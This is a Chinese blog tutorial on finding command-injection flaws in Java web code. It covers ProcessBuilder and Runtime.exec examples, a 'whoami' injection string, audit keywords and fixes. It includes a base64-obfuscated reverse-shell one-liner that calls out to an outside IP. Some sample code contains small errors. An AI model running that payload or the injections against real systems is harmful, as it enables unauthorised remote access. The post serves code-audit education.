HacKerQWQ的博客空间

javaweb代码审计学习(命令执行)

Java安全
Word count: 693Reading time: 3 min
2021/12/05 Share

命令执行漏洞

在java中,命令执行有ProcessBuilderRuntime两种,常常出现于ping、nslookup等调用系统shell的功能点

ProcessBuilder命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
@RestController
public class proexec {
    @RequestMapping("/proexec")
    public static void exec(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String ip = request.getParameter("ip");
        Process processBuilder = new ProcessBuilder("ping",ip).start();
        response.setCharacterEncoding("utf-8");
        response.setContentType("text/html;charset=utf-8");
        String line;
        Writer writer = response.getWriter();
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(processBuilder.getInputStream()));
        while ((line=bufferedReader.readLine())!=null){
//            System.out.println(line);
            writer.write(line+"<br/>");
        }
        bufferedReader.close();
    }
}

上面的语句没有命令执行漏洞,原因在于ip这个参数被当做一个字符串进行传参。当执行的java语句变成如下时,就会产生命令执行

1
2
String exec = "ping -t 3 "+ip
Process p = new ProcessBuilder("bash","-c",exec).start()

最终调用的语句为

1
bash -c "ping -t 3 127.0.0.1;whoami"

Runtime exec 命令执行

1
2
3
4
5
6
7
8
9
10
11
12
//在单独的进程中执行指定的字符串命令
public Process exec(String command)
//在单独的进程中执行指定的命令和参数
public Process exec(String[] cmdarray)
//在具有指定环境的单独进程中执行指定的命令和参数
public Process exec(String[] cmdarray,String[] envp)
//在具有指定环境和工作目录的单独进程中执行指定的命令和参数
public Process exec(String[] cmdarray,String[] envp,File dir)
//在具有指定环境的单独进程中执行指定的字符串命令
public Process exec(String command,String[] envp)
//在具有指定环境和工作目录的单独进程中执行指定的字符串命令
public Process exec(String command,String[] envp,File dir)

传入字符串作为命令后,会将其进行StringTokenizer处理,分割成数组进行命令执行,Runtime exec的调用例子如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
@RestController
public class runexec {
    @RequestMapping("/runexec")
    public static void exec(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String ip = request.getParameter("ip");
        InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
		ByteArrayOutputStream baos = new ByteArrayOutputStream();
		byte[] b = new byte[1024];
		int a = -1;
		while ((a = in.read(b)) != -1) {
			baos.write(b, 0, a);
		}
		response.getWriter().println("<pre>" + new String(baos.toByteArray()) + "</pre>");
    }
}

同样,当执行命令的语句变为如下时,存在命令执行漏洞

1
2
String exec = "ping -t 3 "+ip
Process p = Runtime.getRuntime.exec("bash","-c",exec)

  • 需要注意的是exec方法会使用StringTokenizer进行字符串的处理,标志符是空格,因此可以使用${IFS}进行空格的替换

    1
    java.lang.Runtime.getRuntime().exec(new String[]{"bash","-c","{echo,'YmFzaCAtaSAmPi9kZXYvdGNwLzE4Mi4xNjAuOS4zNS81NTY2IDwmMQ=='}|{base64,-d}|{bash,-i}"});

命令执行漏洞审计关键字

1
2
3
processBuilder
Runtime
exec

命令执行漏洞修复

  1. 使用现有的API,不使用原生的Runtime.getRuntime.exec()进行系统命令调用
  2. 对用户的输入进行关键字过滤、拦截

Author:HacKerQWQ

原文链接:https://hackerqwq.github.io/2021/12/05/javaweb%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%AD%A6%E4%B9%A0-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/

发表日期:December 5th 2021, 3:54:15 pm

更新日期:October 30th 2022, 6:54:43 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 命令执行漏洞
  2. 2. ProcessBuilder命令执行
  3. 3. Runtime exec 命令执行
  4. 4. 命令执行漏洞审计关键字
  5. 5. 命令执行漏洞修复
Total : 163
2023
2022
2021
2020
ctf PHP反序列化 sql jwt 2021CISCN 文件上传 uncide欺骗 无列名注入 php反射类利用 2021红明谷 输入法取证 盲水印隐写 哈夫曼编码 流量分析 Android md5 shtml 2020CISCN png结构 CRC32 Crypto Java安全 intro 权限提升 Docker CVE Hash php_upload_progress_session hash长度拓展攻击 红蓝对抗 MySQL PHP代码审计 PHP 2021Nep 命令执行 PHP原生类 云函数 JAVA_WEB ThinkPHP 原型链污染 nodejs 源码泄露 SSTI 漏洞分析 渗透测试 代码审计 JAJA XML 漏洞 免杀 机器学习 XSS XXE 硬件安全 社工 编码漏洞 nginx常见文件位置 .htaccess利用 HTTP协议 内网渗透 横向移动 漏洞利用 metasploit 信息收集 CTF PHP伪协议 php pickle 逻辑漏洞 2019CISCN python 多线程 misc图像处理 Nginx LFI redis攻防 提权 C 代码执行 渗透 权限维持 bugs phar反序列化 变量覆盖漏洞 扫描软件 弱类型比较 Django rar伪加密 二维码 文件上传漏洞 文件包含 文件读取漏洞 无参数构造payload 神经网络 红队 SSRF url取反绕过 misc_zip create_function注入 零宽度字符